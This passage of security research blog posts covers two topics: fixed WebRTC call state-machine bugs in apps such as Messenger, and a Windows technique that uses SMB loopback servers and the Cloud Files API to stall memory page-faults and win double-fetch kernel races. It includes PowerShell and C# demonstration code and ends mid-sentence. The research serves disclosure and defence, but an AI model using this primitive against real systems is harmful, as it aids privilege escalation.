I was concerned that there might be a way to bypass the alteration of the offer, but I looked at how this was done, and while I generally don’t recommend using anything other than adding or disabling tracks to disable input device transmission, it was fairly robust. The offer is altered after the SDP is decoded into an internal WebRTC object, and the changes are made directly to this object, which eliminates the possibility of parsing errors.

However, looking at how incoming messages are handled, I noticed that many message types other than offers, answers and candidates are processed before the call is answered. One type that stood out was called SdpUpdate. When an SdpUpdate message is received, the local offer or answer is updated by calling setLocalDescription.

This message type didn’t do anything when sent to the state machine above, as it is already storing SDP and waiting to call setLocalDescription. But in the situation where the user is logged into two devices, it caused setLocalDescription to be called and started the audio connection.

It is not clear what the SdpUpdate message type is used for in Facebook Messenger. I tried many scenarios on my test devices, including network switchover, and was not able to generate one in normal use. Regardless, it is clear that it was not intended for this message type to be received before the call is answered. It is similar to the Signal bug described above, in that it is not related to the application’s use of WebRTC, but due to a missing check when handling input that can cause state transitions.

This vulnerability was fixed in November 2020 with server changes that prevent this message type from being sent before a call is connected.
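The fix for this issue was made on the server. As a complementary client-side defence, a callee could allowlist which message types it accepts before the user answers, and buffer those without touching the WebRTC session. The sketch below is hypothetical: the state names, message-type strings and allowlist are illustrative, not Messenger's actual protocol.

```python
from enum import Enum, auto


class CallState(Enum):
    RINGING = auto()    # offer received, user has not answered
    CONNECTED = auto()  # user explicitly accepted the call


# Illustrative allowlist: messages that may be *stored* before consent.
PRE_ANSWER_ALLOWED = {"Offer", "Candidate"}


class Callee:
    def __init__(self) -> None:
        self.state = CallState.RINGING
        self.pending = []
        self.local_description_set = False

    def on_message(self, msg_type: str, payload: object) -> bool:
        """Return True if the message was accepted, False if it was dropped."""
        if self.state is not CallState.CONNECTED:
            if msg_type not in PRE_ANSWER_ALLOWED:
                return False  # e.g. an early SdpUpdate is ignored
            self.pending.append((msg_type, payload))  # buffered, not applied
            return True
        if msg_type == "SdpUpdate":
            # Stand-in for calling setLocalDescription once consent exists.
            self.local_description_set = True
        return True

    def answer(self) -> list:
        """User consented: switch state and return buffered messages to apply."""
        self.state = CallState.CONNECTED
        buffered, self.pending = self.pending, []
        return buffered


callee = Callee()
print(callee.on_message("SdpUpdate", "v=0"))  # → False
```

An allowlist fails closed: a message type nobody expected to arrive early, like SdpUpdate, is dropped by default rather than processed.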

Other Applications

There were a few other applications I looked at and did not find problems with their state machines. I looked at Telegram in August 2020, right after video conferencing was added to the application. I did not find any problems, largely because the application does not exchange the offer, answer or candidates until the callee has answered the call. I looked at Viber in November 2020, and did not find any problems with their state machine, though challenges reverse engineering the application made this analysis less rigorous than the other applications I looked at.


The majority of calling state machines I investigated had logic vulnerabilities that allowed audio or video content to be transmitted from the callee to the caller without the callee’s consent. This is clearly an area that is often overlooked when securing WebRTC applications.

The majority of the bugs did not appear to be due to developer misunderstanding of WebRTC features. Instead, they were due to errors in how the state machines are implemented. That said, a lack of awareness of these types of issues was likely a factor. It is rare to find WebRTC documentation or tutorials that explicitly discuss the need for user consent when streaming audio or video from a user’s device.

Many of these state machines had needless complexity in how they handled call set-up, which was also a factor. Unnecessary threading, reliance on obscure features and large numbers of states and input types increase the likelihood of this type of vulnerability occurring in a signalling state machine.

It is also concerning to note that I did not look at any group calling features of these applications, and all the vulnerabilities reported were found in peer-to-peer calls. This is an area for future work that could reveal additional problems.


I investigated the signalling state machines of seven video conferencing applications and found five vulnerabilities that could allow a caller device to force a callee device to transmit audio or video data. All these vulnerabilities have since been fixed. It is not clear why this is such a common problem, but a lack of awareness of these types of bugs as well as unnecessary complexity in signalling state machines is likely a factor. Signalling state machines are a concerning and under-investigated attack surface of video conferencing applications, and it is likely that more problems will be found with further research.

Windows Exploitation Tricks: Trapping Virtual Memory Access

Posted by James Forshaw, Project Zero

This blog is a continuation of my series of Windows exploitation tricks. This one describes an exploitation trick I’ve been trying to develop for years, succeeding (mostly, more on that later) on the latest versions of Windows 10. It’s a trick to trap access to virtual memory, get feedback when it occurs and delay access indefinitely. The blog will go into some of the background for why this technique is useful, an overview of the research I did to find the trick as well as an overview of the types of vulnerabilities it can be used with.


When would you need such an exploitation trick? A good example of the types of security vulnerabilities which can benefit can be found in the seminal Bochspwn research by Mateusz Jurczyk and Gynvael Coldwind. The research showed a way of automating the discovery of memory double-fetches in the Windows kernel.

If you’ve not read the paper, a double-fetch is a type of Time-of-Check Time-of-Use (TOCTOU) vulnerability where code reads a value from memory, such as a buffer length, verifies that value is within bounds and then rereads the value from memory before use. By swapping the value in memory between the first and second fetches the verification is bypassed which can lead to security issues such as privilege escalation or information disclosure. The following is a simple example of a double fetch taken from the original paper.

DWORD* lpInputPtr = // controlled user-mode address
UCHAR  LocalBuffer[256];

if (*lpInputPtr > sizeof(LocalBuffer)) { // ① first fetch: size check
    return STATUS_BUFFER_OVERFLOW;
}
RtlCopyMemory(LocalBuffer, lpInputPtr, *lpInputPtr); // ② second fetch: copy length

This code copies a buffer from a controlled user-mode address into a fixed-size stack buffer. The buffer starts with a DWORD size value which indicates the total size of the buffer. Memory corruption can occur if the size value pointed to by lpInputPtr changes between the first read of the size value, which is compared against the buffer size ①, and the second read of the size when copying into the buffer ②. For example, if the first time the value is read it's 100 and the second time it's 400, the code will pass the size check as 100 is less than 256, but will then copy 400 bytes into that buffer, corrupting the stack.
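The bug pattern can be modelled deterministically. Here UserBuffer, a hypothetical stand-in for the user-mode buffer, returns a different size on each read, which is what a racing writer thread achieves when it wins the race between ① and ②. The fixed variant shows the usual remedy: fetch the value once into a local and use that copy for both the check and the copy.

```python
LOCAL_BUFFER_SIZE = 256  # sizeof(LocalBuffer)


class UserBuffer:
    """Hypothetical user-mode buffer whose size field changes between reads."""

    def __init__(self, sizes):
        self._sizes = iter(sizes)  # value seen by each successive fetch

    def read_size(self) -> int:
        return next(self._sizes)


def vulnerable_copy(buf: UserBuffer) -> int:
    """Mirror of the C code: returns the number of bytes it would copy."""
    if buf.read_size() > LOCAL_BUFFER_SIZE:  # ① first fetch, used for the check
        raise ValueError("size check failed")
    return buf.read_size()                   # ② second fetch, used for the copy


def fixed_copy(buf: UserBuffer) -> int:
    size = buf.read_size()                   # single fetch into a local
    if size > LOCAL_BUFFER_SIZE:
        raise ValueError("size check failed")
    return size                              # the checked value is the used value


print(vulnerable_copy(UserBuffer([100, 400])))  # → 400, overflowing the 256-byte buffer
print(fixed_copy(UserBuffer([100, 400])))       # → 100
```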

Once a vulnerability such as this example was discovered, Mateusz and Gynvael needed to exploit it. How they achieved exploitation is detailed in section 4 of the paper. The exploit techniques that were identified were all probabilistic. Exploitation typically required two threads racing each other, one reading and one writing. Success is probabilistic because it depends on the writing thread setting the new value in the window between the first and second reads of the memory location.

To widen the TOCTOU window, many of the techniques described abuse the behavior of virtual memory on Windows. A process on Windows can typically access a large virtual memory region of up to 8TiB in size. This size is likely to be significantly larger than the physical memory in the system, especially considering the limit is per-process, not per-system. Therefore, to maintain the illusion of such a large address space, the kernel uses on-demand memory paging.

When memory is allocated in the process the CPU’s page tables are set up to indicate the presence of the memory region but are marked as invalid. At this point the virtual memory region has been allocated but there is no physical memory backing it. When the process tries to access that memory region the CPU will generate an exception, generally referred to as a page-fault, which is handled by the kernel.

The kernel can look up the memory address which was accessed to cause the page-fault and try to fix the fault. How the page-fault is fixed depends on the type of memory access. A simple example is if the memory was allocated but not yet used: the kernel will get a physical memory page, initialize it to zeros, then adjust the page tables to map that new physical memory page at the faulting address. Once the page-fault has been fixed, the faulting thread can be restarted at the instruction which accessed the memory, and the memory access should now succeed as if the memory had always been present.
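A toy model of the demand-zero case just described: the region is reserved up front, but a zero-filled page only comes into existence the first time an address in it is touched, after which the access is retried and later accesses hit the now-present page. LazyRegion is purely illustrative; real page tables and fault handling live in the kernel.

```python
PAGE_SIZE = 4096


class LazyRegion:
    """Reserved address range whose pages are created on first access."""

    def __init__(self, size: int) -> None:
        self.size = size
        self.present = {}  # page index -> backing bytes, only for faulted-in pages
        self.faults = 0

    def _page_fault(self, page: int) -> None:
        # Demand-zero fix-up: allocate a fresh page and initialize it to zeros.
        self.faults += 1
        self.present[page] = bytearray(PAGE_SIZE)

    def read(self, addr: int, n: int) -> bytes:
        if addr < 0 or addr + n > self.size:
            raise IndexError("access outside the allocated region")
        out = bytearray()
        for a in range(addr, addr + n):
            page, off = divmod(a, PAGE_SIZE)
            if page not in self.present:
                self._page_fault(page)  # fix the fault, then retry the access
            out.append(self.present[page][off])
        return bytes(out)


region = LazyRegion(1 << 30)   # 1GiB reserved, nothing backed yet
region.read(0, 4)
region.read(PAGE_SIZE - 2, 4)  # straddles pages 0 and 1: one new fault
print(region.faults)  # → 2
```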

A more complex scenario is if the page is part of a memory mapped file. In this case the kernel will need to request that the page’s data is read back from disk before it can satisfy the page-fault. This can take quite a long time, at least for spinning rust disks, so it might require the faulting thread to be suspended while it waits for the page to be read. Once the page has been read the memory can be fixed up, the original thread can be resumed and the thread restarted at the faulting instruction.

Overview diagram of page fault causing access to the file system. A user application is shown reading memory from a file mapped into memory. When the memory read occurs a page fault is generated in the kernel. As the memory is part of a file mapping this calls into the IO Manager which then requests the file data from the file system. The read data is then returned back through the kernel to satisfy the page fault and the user application can complete the memory read.

The end result is that handling a page-fault can take a significant amount of time, relative to a CPU's native speed that is. However, abusing these virtual memory behaviors only widens the TOCTOU window; it doesn't allow for precise timing of when to swap values in memory. As a result, the exploitation techniques still came with limitations. For example, exploitation was very slow, if not impossible in some cases, on a machine with a single CPU core, as it relies on having concurrent threads reading and writing.

An ideal exploit primitive would be one where the exploitation window can be made arbitrarily large so that it becomes trivial to win the race. Based on previous experience and knowledge of existing bug classes, my ideal primitive would meet the following criteria:

  • Works on a default installation of Windows 10 20H2.
  • Gives a clear signal when memory is read or written.
  • Works when memory is accessed from both user and kernel mode.
  • Allows for delaying memory access indefinitely.
  • The data in the memory accessed is arbitrary.
  • The primitive can be set up from a range of privilege levels.
  • Can trap multiple times during the same exploit.

While meeting all these criteria would be ideal, there's no guarantee we'll meet all or any of them. If we only meet some, then the range of exploitable vulnerabilities might be limited. Let's start with a quick overview of the existing work which might give us an idea of how to proceed to find a primitive.

Existing Work

Having spoken to Mateusz and looked for any subsequent work, I found little novel work beyond the original Bochspwn paper on the exploitation of these types of TOCTOU issues. At least this is true for exploitation on Windows; novel techniques have, however, been developed on other platforms, specifically Linux. Both of these techniques rely on the behavior of virtual memory I previously described.

The first technique in Linux makes use of Userfault File Descriptor (userfaultfd) to get notifications when page-faults occur in a process. With userfaultfd enabled, a secondary thread in the process can read a notification and handle the page-fault in user mode. Handling the fault could be mapping memory at the appropriate location or changing page protection. The key is that the faulting thread is suspended until the page-fault is handled by another thread. Therefore, if a kernel function accesses the memory, the request will be trapped until the fault is handled. This allows for a primitive where the memory access can be delayed indefinitely as well as providing a timing signal for the access. Using userfaultfd also allows read and write faults to be distinguished, as the memory page can be write-protected.

Using userfaultfd works for in-process access, such as from the kernel, but is not really useful if the code accessing the memory is in another process. To solve that problem you can use the FUSE file system, as Jann Horn demonstrated in a previous Project Zero blog post. A FUSE file system is implemented entirely in user mode, but any requests for the file go through the Linux kernel's Virtual File System APIs. As a file is accessed as if it was implemented by an in-kernel file system, it's possible to map that file into memory using mmap. When a page-fault occurs on a FUSE-backed memory region, a request will be made to the user-mode file system daemon, which can delay the read or write request indefinitely.

Remote File Systems

As far as I can tell there's nothing equivalent to Linux's userfaultfd on Windows. One feature which caught my eye was memory write watches. However, they only seem to allow an application to query whether memory has been written to since the last time it was checked, and don't allow memory writes to be trapped.

If we can’t just trap page-faults to virtual memory what about mapping a file on a user-mode filesystem like FUSE? Unfortunately there is no built-in FUSE driver in Windows 10 (yet?), but that doesn’t mean there’s no mechanism to implement a file system in user-mode. There are some efforts to make a real FUSE on Windows, such as the WinFsp project, but I’d expect the chances of them being installed on a real system to be vanishingly small.

The first thought I had was to try to exploit Multiple UNC Provider (MUP) clients. When you access a file via a UNC path, e.g. \\server\share\file.bin, this will be handled by a MUP driver in the kernel, which will pass it to one of the registered client drivers. As far as the kernel is concerned the opened file is a regular file (with some caveats) which generally means the file can be mapped into memory. However, any requests for the contents of that file will not be handled directly, but instead handled by a server over a network protocol.

Ideally we should be able to implement our own server, handle the read or write requests to a file mapping which will allow us to detect or delay the request so that we can exploit any TOCTOU. The following table contains only Microsoft MUP drivers that I identified. The table contains what versions of Windows 10 the driver is supported on and whether it’s something enabled by default.

Remote File System    | Supported Version | Enabled by Default
SMB                   | All               | Yes (SMBv1 might be disabled)
WebDAV                | All               | Yes (except Server SKUs)
NFS                   | All               | No
P9                    | Windows 10 1903   | No (needs WSL)
Remote Desktop Client | All               | Yes

While MUP was designed for remote file systems, there's no requirement that the file system server is actually remote. SMB, WebDAV and NFS are IP-based protocols and can be redirected to localhost. P9 uses a local Unix socket which can't be remoted anyway. The terminal services client sends file access requests back to the client system over the RDP protocol. For all these protocols we can implement the server, with varying degrees of effort, and see if we can detect and delay reads and writes to the file mapping.

I decided to focus on only two, SMB and WebDAV. These were the only two which are both enabled by default and trivially usable. While the Remote Desktop Client is in theory installed by default, the RDP server is not normally enabled. Also, setting up the RDP session is complex and might require valid authentication credentials, therefore I decided against it.

Server Message Block

SMB is almost as old as Windows itself, having been introduced in Lan Manager 1.0 back in 1987. The latest SMB version 3.1 protocol only bears a passing resemblance to that original version having shed its NetBIOS roots for a TCP/IP connection. Its lineage does mean it’s the best integrated of any of the network file systems, with the MUP APIs being designed around the needs of SMB.

I decided to do a simple test of the behavior of mapping a file over SMB. This is fairly easy as you can access SMB on the same machine via localhost. I first created a 1GiB file on a local disk, the rationale being if SMB supports caching file data it’s unlikely to read something that large in one go. I then started Wireshark and monitored the loopback interface to capture the SMB traffic as shown below.

Overview diagram of SMB test with Wireshark in place to inspect the network traffic from the SMB client to the SMB server. The diagram starts with a user application reading memory of a mapped file, which causes a page fault. As the file is on an SMB share, this calls into the SMB client, which sends a request to the SMB server and from there to the file system. Between the SMB client and SMB server components, the Wireshark logo indicates where we are monitoring the network traffic.

I then wrote a quick PowerShell script which maps the file into memory and then reads a few bytes from memory at a few different offsets.

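# Requires the NtObjectManager module (Use-NtObject, Get-NtFile, New-NtSection, Add-NtSection).
Use-NtObject($f = Get-NtFile "\\localhost\c$\root\file.bin" -Win32Path) {
    Use-NtObject($s = New-NtSection -File $f -Protection ReadWrite) {
        Use-NtObject($m = Add-NtSection -Section $s -Protection ReadWrite) {
            # Read 4 bytes at offsets 0, 256MiB, 512MiB and 768MiB into the mapping.
            $m.ReadBytes(0, 4)
            $m.ReadBytes(256*1024*1024, 4)
            $m.ReadBytes(512*1024*1024, 4)
            $m.ReadBytes(768*1024*1024, 4)
        }
    }
}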

This just reads 4 bytes from each of the offsets 0, 256MiB, 512MiB and 768MiB. Going back to Wireshark, I filtered the output to only SMBv2 read requests using the display filter smb2.cmd == 8, and the following four packets can be observed.

Read Request Len:32768 Off:0 File: root\file.bin

Read Request Len:32768 Off:268435456 File: root\file.bin

Read Request Len:32768 Off:536870912 File: root\file.bin

Read Request Len:32768 Off:805306368 File: root\file.bin 

This corresponds with the exact memory offsets we accessed in the script, although the length is always 32KiB, not the 4 bytes we requested. Note that this is not the typical Windows memory allocation granularity of 64KiB which you might expect. In my testing I've never seen anything other than 32KiB requested.
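To script the same check outside Wireshark, a minimal parser can pull the requested length and offset out of an SMB2 READ request. The field offsets follow the SMB2 header and READ request layouts in Microsoft's [MS-SMB2] specification; the sketch assumes a single message that is neither encrypted nor compressed, with its 4-byte Direct TCP transport prefix already removed. parse_read_request is a hypothetical helper.

```python
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_READ = 0x0008                # command code matched by smb2.cmd == 8
SMB2_FLAGS_SERVER_TO_REDIR = 0x1  # set on responses, clear on requests
HEADER_SIZE = 64                  # fixed SMB2 header size


def parse_read_request(msg: bytes):
    """Return (length, offset) if `msg` is an SMB2 READ request, else None."""
    if len(msg) < HEADER_SIZE + 16 or msg[:4] != SMB2_MAGIC:
        return None
    (command,) = struct.unpack_from("<H", msg, 12)
    (flags,) = struct.unpack_from("<I", msg, 16)
    if command != SMB2_READ or flags & SMB2_FLAGS_SERVER_TO_REDIR:
        return None
    # READ request body: StructureSize(2) Padding(1) Flags(1) Length(4) Offset(8) ...
    length, offset = struct.unpack_from("<IQ", msg, HEADER_SIZE + 4)
    return length, offset
```

Run over the packets above, it would be expected to yield (32768, 268435456) for the second request, matching Wireshark's Len and Off columns.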

All the offsets we've tested are aligned to a 32KiB block. What if the bytes were not aligned, for example if we accessed 4 bytes from offset 512MiB minus 2? Adding the following line to the script allows us to check the behavior:

$m.ReadBytes(512*1024*1024 - 2, 4)

In Wireshark we see the following read requests.

Read Request Len:32768 Off:536838144 File: root\file.bin

Read Request Len:32768 Off:536870912 File: root\file.bin

The accesses are still at 32KiB boundaries; however, as the request straddles two blocks, the kernel has fetched the preceding 32KiB of data from the file and then the following 32KiB. You might think that all makes sense; however, this behavior turned out to be a fluke of testing.

Overview diagram of memory read layout. In the middle is a set of boxes representing the native 4KiB pages being read. All the boxes are contained within a single larger region which is the large page size. Above the boxes are arrows which show that from the base of the 4KiB box a 32KiB read will be made into the file which can satisfy the reads from other 4KiB pages. The final box shows that the last 32KiB of the large page size will always be read as a single page regardless of where in the box the read occurs.

The diagram above shows how mapped file reads are handled. When an address is read, the kernel will request 32KiB starting from the 4KiB page boundary at or below that address, not from a 32KiB boundary. However, there's then a secondary structure on top, based on the supported size of large pages: if the read is anywhere within the last 32KiB of a large page, the read offset is always that of the last 32KiB.

For example, on my system the large page size (as queried using the GetLargePageMinimum API) is 2MiB. Therefore, starting at offset 512MiB, for accesses between 512MiB and 514MiB - 32KiB the kernel will read 32KiB from the offset truncated to the 4KiB boundary. For accesses between 514MiB - 32KiB and 514MiB the read will always request offset 514MiB - 32KiB, so that the 32KiB doesn't cross the large page boundary.
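The observed rule can be written as a small function and checked against the Wireshark captures above. This models the behavior measured in these tests, not a documented kernel algorithm, and it assumes a 4KiB native page and the 2MiB large-page size reported on the test system.

```python
KiB, MiB = 1024, 1024 * 1024
PAGE_SIZE = 4 * KiB    # native page size (assumed)
READ_SIZE = 32 * KiB   # size of every SMB read request observed
LARGE_PAGE = 2 * MiB   # GetLargePageMinimum() result on the test system


def smb_read_offset(addr: int) -> int:
    """File offset of the 32KiB read triggered by touching file offset `addr`."""
    page_start = addr - addr % PAGE_SIZE               # truncate to the 4KiB boundary
    large_end = (addr // LARGE_PAGE + 1) * LARGE_PAGE  # end of the enclosing large page
    return min(page_start, large_end - READ_SIZE)      # never cross the large page


print(smb_read_offset(512 * MiB - 2))  # → 536838144 (512MiB - 32KiB)
print(smb_read_offset(512 * MiB + 2))  # → 536870912
print(smb_read_offset(514 * MiB - 1))  # → 538935296 (514MiB - 32KiB)
```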

This allows reads at 4KiB boundaries, however the amount of data read is still 32KiB. This means that once one 4KiB page is accessed the kernel will populate the current page and 7 following pages. Is there any way to only populate a single native page? Based on a comment from Mateusz I tested returning short reads. If the SMB server returns fewer bytes than requested from the read then rather than failing it only populates the pages covered by the read. By returning these short reads we can get trap granularity down to the native page size except for the final 32KiB of a large page. If a read request is shorter than the native page size the rest of the page is zeroed.
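A sketch of the effect of short reads, under the behavior described above: the client maps only the native pages that the returned bytes cover (zero-filling the tail of a partially covered page), so answering each 32KiB request with exactly 4KiB leaves the other seven pages unpopulated and still able to trap. populated_pages is a hypothetical helper that assumes 4KiB pages.

```python
PAGE_SIZE = 4096
READ_SIZE = 32 * 1024


def populated_pages(request_offset: int, returned: int) -> list:
    """File page indices filled in when a READ_SIZE request at `request_offset`
    is answered with only `returned` bytes."""
    returned = min(returned, READ_SIZE)
    if returned <= 0:
        return []
    first = request_offset // PAGE_SIZE
    last = (request_offset + returned - 1) // PAGE_SIZE  # a partial last page still counts
    return list(range(first, last + 1))


print(populated_pages(0, READ_SIZE))  # → [0, 1, 2, 3, 4, 5, 6, 7]
print(populated_pages(0, PAGE_SIZE))  # → [0]
```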

What about writing? Let’s change the script again to call WriteBytes rather than ReadBytes, for example:

$m.WriteBytes(256*1024*1024, @(0xAA, 0xBB, 0xCC, 0xDD))

You will see a write request to the file in Wireshark, similar to the following:

Write Request Len:4096 Off:268435456 File: root\file.bin

However, if you dig a bit deeper you'll notice that the write only happens once the file is closed, not in response to the WriteBytes call. This makes sense: there isn't any easy way to detect when the write happened in order to force the page to be flushed back to the file system. Even if there were, flushing to a network server on every write would have a massive performance impact.

All is not lost, however. Before the memory is safe to write, it must be populated with the contents from the file. Therefore, if you look before the write request, you'll see a corresponding read request for the 32KiB region which encompasses the write location, issued synchronously with the memory write. You can detect a write through its corresponding read, but you can't distinguish a read from a write at the protocol level.

All this testing indicates if we have control over the server we can detect memory access to the mapped file. Can we delay the access as well? I wrote a simple SMB server in .NET 5 using the SMBLibrary by Tal Aloni. I implemented the server with a custom filesystem handler and added some code to the read path which delays for 10 seconds when the file offset is greater than 512MiB.

if (Position >= (512 * 1024 * 1024)) {
    Console.WriteLine("====> Delaying at Position {0:X}", Position);
    Thread.Sleep(10000); // 10 second delay (System.Threading)
    Console.WriteLine("====> Continuing.");
}

The data returned by the read operation can be arbitrary; you just need to fill in the appropriate byte buffers in the read. To test the access times, I wrapped the memory read requests inside a Measure-Command call to time each memory access.
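The same idea in a self-contained form: a hypothetical read callback for a user-mode file server (not SMBLibrary's actual handler interface) that stalls any read at or above 512MiB and then returns arbitrary bytes. It also stops at the next 4KiB boundary, i.e. returns a short read, so each trap populates a single page. The delay and logger are parameters only to make the sketch easy to test.

```python
import time

MiB = 1024 * 1024
PAGE_SIZE = 4096
TRAP_OFFSET = 512 * MiB  # reads at or above this file offset are stalled


def handle_read(offset: int, length: int, delay: float = 10.0, log=print) -> bytes:
    """Hypothetical server-side read callback.

    While this function sleeps, the client thread whose page-fault caused the
    read stays blocked. The returned data is arbitrary (here 0x41 bytes) and is
    cut off at the next 4KiB boundary: a short read, so only one page is filled.
    """
    if offset >= TRAP_OFFSET:
        log(f"====> Delaying at Position {offset:X}")
        time.sleep(delay)
        log("====> Continuing.")
    n = min(length, PAGE_SIZE - offset % PAGE_SIZE)
    return b"A" * n
```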

Measure-Command { $m.ReadBytes(512*1024*1024 - 4, 4) }

Measure-Command { $m.ReadBytes(512*1024*1024 - 4, 4) }

Measure-Command { $m.ReadBytes(512*1024*1024, 4) }

Measure-Command { $m.ReadBytes(512*1024*1024, 4) }

To compare access times, a read request is made to a location 4 bytes below the 512MiB boundary and then to one at the 512MiB boundary. By making each request twice, we should be able to see whether the results differ per read. The results were as follows:

Access                   | Days | Hours | Minutes | Seconds | Milliseconds
Below 512MiB (Request 1) | 0    | 0     | 0       | 1       | 25
Below 512MiB (Request 2) | 0    | 0     | 0       | 0       | 1
Above 512MiB (Request 1) | 0    | 0     | 0       | 10      | 358
Above 512MiB (Request 2) | 0    | 0     | 0       | 0       | 1

The first access below 512MiB takes around a second; this is because the request still needs to be made to the server, and the server is written in .NET, which can have a slow startup time for running new code. The second request takes significantly less than 1 second: the memory is now cached locally, so no request needs to be made.

For the accesses above 512MiB, the first request takes around 10 seconds, which correlates with the added delay. The second request takes less than a second because the page is now cached locally. This is exactly what we'd expect, and shows that we can delay the access for at least 10 seconds. In fact, you can delay the request for around 60 seconds before the connection is forcibly reset. This limit comes from the SMB client's session timeout, which you can query using the following command in PowerShell:

PS> (Get-SmbClientConfiguration).SessionTimeout


A few things to note about the SMB client's behavior which came out of testing. First, the client or the Windows cache manager seems to be able to cache parts of the remote file. If you request a specific access when opening the file, such as GENERIC_READ | GENERIC_WRITE for the desired access, then caching is enabled. This means read requests do not go to the server if the data has previously been cached locally. However, if you specify MAXIMUM_ALLOWED for the desired access, caching doesn't seem to take place. Secondly, parts of the file are sometimes pre-cached, such as the first and last 32KiB of the file. I've not worked out the cause; oddly, it seems to happen more often with native code than .NET code, so perhaps it's Windows Defender peeking at memory, or perhaps Superfetch. In general, as long as you keep your memory accesses somewhere in the middle of a large file you should be safe.

If you've run the example code, you might have noticed a problem: running the example server locally fails with the following error:

System.Net.Sockets.SocketException (10013): An attempt was made to access a socket in a way forbidden by its access permissions.

By default Windows 10 has the SMB server enabled. It takes over the SMB TCP ports and makes them exclusive, so a normal user can't bind to them. It is possible to disable the local SMB server, but that requires administrator privileges. Still, it was worth verifying whether the SMB server approach will work even if we have to communicate with a remote server.

I did investigate tricks I could use to get the built-in SMB server to work for our purposes. For example, I tried to use the fact that you can set an Opportunistic Lock (OpLock) which will trap file reads; I used this trick to exploit a TOCTOU vulnerability in the LUAFV driver. Unfortunately, the SMB server detects that the file already has an OpLock and waits for the OpLock break to occur before allowing access to the file. This made it a non-starter.

For testing you can disable the LanmanServer service and its corresponding drivers. If you wanted to use this on an arbitrary system you'd almost certainly need to connect to a remote server. I’ve released the example server code here, which can be repurposed, although it is only a demonstrator. It allows for read granularity of the native page size, which is assumed to be 4KiB. The server code should work on Linux but as of version 1.4.3 of SMBLibrary on NuGet there’s a bug which causes the server to fail when starting. There is a fix in the github repository but at the time of writing there’s no updated package.

How well does abusing the SMB client meet with our criteria from earlier? I’ve crossed out all the ones we’ve met.

  • Works on a default installation of Windows 10 20H2.
  • Gives a clear signal when memory is read or written.
  • Works when memory is accessed from both user and kernel mode.
  • Allows for delaying memory access indefinitely.
  • The data in the memory accessed is arbitrary.
  • The primitive can be set up from a range of privilege levels.
  • Can trap multiple times during the same exploit.

Using the SMB client meets the majority of our criteria. I verified that the access traps regardless of whether kernel-mode or user-mode code touches the memory. The biggest problem is that it’s hard to use from a sandboxed application, where it would perhaps be most useful. By default MUP restricts access to remote file systems from restricted and low IL processes, and AppContainer sandboxes need specific capabilities which are unlikely to be granted to the majority of applications. That’s not to say it’s completely impossible, but it’d be hard to do.

While our trick doesn’t really delay the memory read indefinitely, for our purposes the 60-second limit imposed by the SMB session timeout is going to be enough for most vulnerabilities. Also, once the trap has been activated you can’t force the memory manager to request the same page from the server again. I tried playing with memory caching flags and direct I/O, but at least for files over SMB nothing seemed to work. However, you can specify your own base address when mapping a file, so you could map different offsets in the file to the same virtual address by unmapping the original and mapping in a new copy. This would allow you to use the same address multiple times.


As SMB can’t easily be used locally, what about WebDAV? By default TCP port 80 is unused on Windows 10, so we can start our own web server to communicate with. Also, unlike on Linux, binding to TCP ports below 1024 doesn’t require administrator privileges. Even if either of these didn’t hold, the WebDAV client supports a syntax to specify the TCP port of the server. For example, if you use the path \\server@8080\share, the WebDAV HTTP connection will be made over port 8080.

But does the WebDAV client expose the right read and write primitives to allow us to trap on memory access? I wrote a simple WebDAV server using the NWebDav library to serve local files. When I ran the script against the WebDAV server on port 8080 to open the 1GiB file, I immediately hit a problem:

Get-NtFile : (0xC0000904) - The file size exceeds the limit allowed and cannot be saved.

Just opening the file fails with the error code STATUS_FILE_TOO_LARGE. The reason for that can be found in one of many Microsoft Knowledge Base articles such as this one. There’s a default limit of 50MB (that’s decimal megabytes) for any file accessed on a WebDAV share because it used to be possible to cause a denial of service by tricking a Windows system into downloading an arbitrarily large file.

The mechanism behind this size limit is also why WebDAV isn’t suitable for this attack. If you resize the file to below 50MB, you’ll find the WebDAV client pulls the entire file down to the local disk before returning from the file open call. That file is then mapped into memory as a local file. The WebDAV server never receives GET or PUT requests synchronously with reads or writes to the memory mapping, so there’s no mechanism to detect or trap specific memory accesses.

File System Overlay APIs

Abusing the SMB client does work, but it can’t be used locally on a default installation, so I decided I needed to look for another approach. While looking at Windows filter drivers (see last blog post), I noticed that a few of the drivers provide a mechanism to overlay another file system on top of an existing one. I trawled through MSDN for the API documentation to see if anything would be suitable. The three I looked at are shown in the table below.

File system | Supported version | Installed by default
Projected File System | Windows 10 1809 | No
Windows Overlay (WOF) | |
Cloud Files API | Windows 10 1709 | Yes (except non-Desktop Server SKUs)

By far the most interesting one is the Projected File System. It was developed by Microsoft to provide a virtual file system for Git. It allows placeholder files to be “projected” into a directory on disk, with the contents of those files only “rehydrated” to a full file on demand. In theory this sounds ideal: as long as it populated the file’s contents piecemeal, we could add delays when receiving the PRJ_GET_FILE_DATA_CB callback.

However, a basic implementation based on Microsoft’s ProjectedFileSystem sample code would always rehydrate the entire file when it was opened, similar to WebDAV. Perhaps there’s an option I missed to stream the contents rather than populate them in one go, but I couldn’t find it immediately. In any case, the Projected File System is not installed by default, making it less useful.

WOF doesn’t really allow you to implement your own file system semantics. Instead, it allows you to overlay files either from a secondary Windows Image File (WIM) or from compressed files on the same volume. This doesn’t give us the control we’re looking for; you might be able to finagle something to work, but it seems like a lot of effort.

That leaves us with the Cloud Files API. It’s used by OneDrive to provide the local online file system, but it is documented and can be used to implement any file system overlay you like. It works very similarly to the Projected File System, with placeholders for files and the concept of hydrating a file on demand. The contents of the files don’t need to come from an online service such as OneDrive; they can all be sourced locally. Crucially, basic testing showed that it supports streaming the contents of the file based on what is being read: you can delay the file data requests, and the reading thread blocks until the read has been satisfied. This is enabled by setting the primary hydration policy (CF_HYDRATION_POLICY_PRIMARY) to CF_HYDRATION_POLICY_PARTIAL when configuring the sync root, so that the Cloud Files API only hydrates the parts of the file which were accessed.

This seemed perfect until I tested it with the PowerShell file mapping script, where it didn’t work: my cloud file provider was always asked to provide the entire file. Checking the Cloud Filter driver, when a request is received to map a placeholder file, the IRP_MJ_ACQUIRE_FOR_SECTION_SYNCHRONIZATION handler always fully rehydrates the file before completing. If the file is not fully hydrated, the call to NtCreateSection never returns, which prevents the file from being mapped into memory.

I was going to go back to my filter research until I realized I might be able to combine the SMB client loopback with the Cloud Filter API. I already knew that the SMB client doesn’t really map a file, even locally; instead, it reads it on demand via the SMB protocol. I also knew that the Cloud Filter API allows streaming parts of the file on demand, as long as the file isn’t being mapped into memory. The final setup is shown in the following diagram:

